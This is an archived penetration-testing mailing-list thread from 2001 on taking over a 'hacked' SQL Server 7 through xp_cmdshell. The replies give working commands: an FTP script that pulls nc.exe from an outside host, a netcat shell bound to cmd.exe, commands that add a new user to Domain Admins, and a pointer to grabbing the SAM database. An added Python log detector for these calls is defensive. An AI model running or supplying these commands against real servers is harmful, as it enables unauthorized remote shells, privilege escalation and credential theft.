Penetration Testing mailing list archives
Re: [PEN-TEST] Hacking a server through SQL SERVER 7
From: "Brentlinger, Mike (ISS eServices)" <mbrentli () ISS NET>
Date: Thu, 25 Jan 2001 14:38:33 -0500
Well, if you were able to run commands via something like the "net user" commands people told you about previously (i.e. EXEC [master].[dbo].[xp_cmdshell] "net user"), you could probably use something like the following commands to create an FTP script file and then have their machine FTP out to x.x.x.x and pull down nc.exe.
From there you can run netcat and you have a shell waiting for you to telnet to.

Make the script:

    echo user>ftpScript.txt
    echo password>>ftpScript.txt
    echo bin>>ftpScript.txt
    echo get nc.exe>>ftpScript.txt
    echo bye>>ftpScript.txt

Run the script to get netcat:

    ftp -s:ftpScript.txt x.x.x.x
    del ftpScript.txt

Run netcat:

    nc -l -p 999 -t -e cmd.exe

Of course this all relies on your compromised SQL server being able to connect to some server via FTP, and requires you to be able to have access to whatever port you open the shell on.

Best of luck
-Mike Brentlinger

-----Original Message-----
From: FiC
To: PEN-TEST () SECURITYFOCUS COM
Sent: 1/25/01 4:32 AM
Subject: Re: Hacking a server through SQL SERVER 7

Thank you all for your valuable information. Is there any way to upload/create a file in the hacked SQL SERVER through the system commands? I think that the machine is behind a firewall and even if I start the FTP service I can't connect via FTP, and port 139 is not open or it's filtered. I've tried to create an .asp file with the "copy con" command, but I can't do it through the SQL console. How can I upload/create an .asp file on this server? Thanx.
Once you have access to an MSSQL 7 server via the "sa" account, you can do all sorts of fun things:

Run system commands:

    EXEC [master].[dbo].[xp_cmdshell] "net user newuser newpass /ADD /DOMAIN"
    EXEC [master].[dbo].[xp_cmdshell] "net group 'Domain Admins' newuser /ADD /DOMAIN"

You can also access the registry, send email, dump system information...

Take a look at some of the Extended Stored Procedures in the [master] database with SQL Query Analyzer. Depending on the user the server runs as (normally SYSTEM or Administrator), you can usually use xp_cmdshell to rebuild the repair disk data with rdisk /s and snag the SAM database.

I will be giving a presentation at the upcoming CanSecWest conference covering a variety of SQL server attacks, everything from general procedure exploitation to insertion techniques. At the conference, I will be releasing a handful of new tools, one of which exploits the RDS component in new ways, allowing access to SQL servers as well as proxying requests to internal systems through it. For more information on the conference, please see http://www.cansecwest.com; online registration should be available within a few weeks.

--
~/ FiC /~
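As an added defensive example (not part of any post in this thread): the lesson for an administrator is that xp_cmdshell and the related extended stored procedures the thread mentions (registry access, mail) turn an "sa" login into operating-system access, so any EXEC of them is worth surfacing from batch-level audit data. The Python below scans audit lines for such calls, pulls out the command string passed to the procedure, and ignores the procedure name when it merely appears inside a string literal of an ordinary query. The tab-separated log format, the severity labels and the sample lines are this example's own constructions; the commands in the sample lines are the ones quoted in the thread.

```python
"""Flag T-SQL batches that invoke high-risk extended stored procedures
(xp_cmdshell and friends) in SQL Server batch audit logs.

Added example for this thread, not code from the original posts. The log
line format is an assumption (tab-separated: timestamp, login, client host,
batch text); adapt parse_line() to whatever your trace/audit export looks like.
"""
import re
from dataclasses import dataclass

# Extended stored procedures the thread describes as post-compromise tooling
# (OS commands, registry access, mail). Severity labels are this example's own.
RISKY_PROCS = {
    "xp_cmdshell": "high",
    "xp_regread": "medium",
    "xp_regwrite": "high",
    "xp_sendmail": "medium",
}

# Match EXEC/EXECUTE followed by an optionally qualified, optionally bracketed
# proc name: xp_cmdshell, master..xp_cmdshell, master.dbo.xp_cmdshell,
# [master].[dbo].[xp_cmdshell]. Requiring EXEC avoids flagging the text
# 'xp_cmdshell' inside a harmless SELECT ... LIKE '%xp_cmdshell%'.
PROC_RE = re.compile(
    r"\bexec(?:ute)?\s+"
    r"(?:\[?master\]?\s*\.\s*(?:\[?dbo\]?)?\s*\.\s*)?"
    r"\[?(?P<proc>xp_\w+)\]?"
    r"\s*(?:'(?P<sq>[^']*)'|\"(?P<dq>[^\"]*)\")?",
    re.IGNORECASE,
)


@dataclass
class Finding:
    timestamp: str
    login: str
    host: str
    proc: str
    severity: str
    argument: str


def parse_line(line: str):
    """Split one audit line into its four fields; return None if malformed."""
    parts = line.rstrip("\n").split("\t", 3)
    if len(parts) != 4:
        return None
    timestamp, login, host, batch = parts
    return {"timestamp": timestamp, "login": login, "host": host, "batch": batch}


def detect(log_text: str) -> list:
    """Return a Finding for every risky extended-proc call in the log text."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for m in PROC_RE.finditer(rec["batch"]):
            proc = m.group("proc").lower()
            if proc not in RISKY_PROCS:
                continue
            # First quoted argument: for xp_cmdshell this is the OS command.
            argument = m.group("sq") or m.group("dq") or ""
            findings.append(Finding(rec["timestamp"], rec["login"], rec["host"],
                                    proc, RISKY_PROCS[proc], argument))
    return findings


def summarize(findings) -> dict:
    """Count findings per procedure name, e.g. {'xp_cmdshell': 2, ...}."""
    counts = {}
    for f in findings:
        counts[f.proc] = counts.get(f.proc, 0) + 1
    return counts


# Constructed sample lines (not captured data); 192.0.2.10 is a documentation address.
SAMPLE_LOG = (
    "2001-01-25 14:30:01\tsa\t10.0.0.5\t"
    'EXEC [master].[dbo].[xp_cmdshell] "net user newuser newpass /ADD /DOMAIN"\n'
    "2001-01-25 14:30:07\tsa\t10.0.0.5\t"
    "exec master..xp_cmdshell 'ftp -s:ftpScript.txt 192.0.2.10'\n"
    "2001-01-25 14:31:12\tappuser\t10.0.0.9\t"
    "SELECT name FROM customers WHERE id = 42\n"
    "2001-01-25 14:32:45\tsa\t10.0.0.5\t"
    "EXECUTE master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', "
    "'SOFTWARE\\Microsoft\\MSSQLServer\\MSSQLServer', 'LoginMode'\n"
    "2001-01-25 14:33:01\tappuser\t10.0.0.9\t"
    "SELECT * FROM notes WHERE body LIKE '%xp_cmdshell%'\n"
)

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f.timestamp} {f.severity:6} {f.login}@{f.host} {f.proc}: {f.argument}")
    print(summarize(detect(SAMPLE_LOG)))
```

Run against the constructed sample, the two xp_cmdshell batches and the xp_regread batch are reported; the SELECT that only mentions xp_cmdshell in a LIKE pattern is not. Any hit from a login that is not a known administrative job is the thing to page on, because the thread's whole point is that a single EXEC of this kind is enough to reach the operating system.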
Current thread:
- [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Aaron C. Newman (Jan 23)
- <Possible follow-ups>
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Derrick K. Bennett (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 H D Moore (Jan 23)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Attonbitus Deus (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Aaron C. Newman (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 MadHat (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 FiC (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Brentlinger, Mike (ISS eServices) (Jan 25)
- Re: [PEN-TEST] Hacking a server through SQL SERVER 7 Frank Knobbe (Jan 25)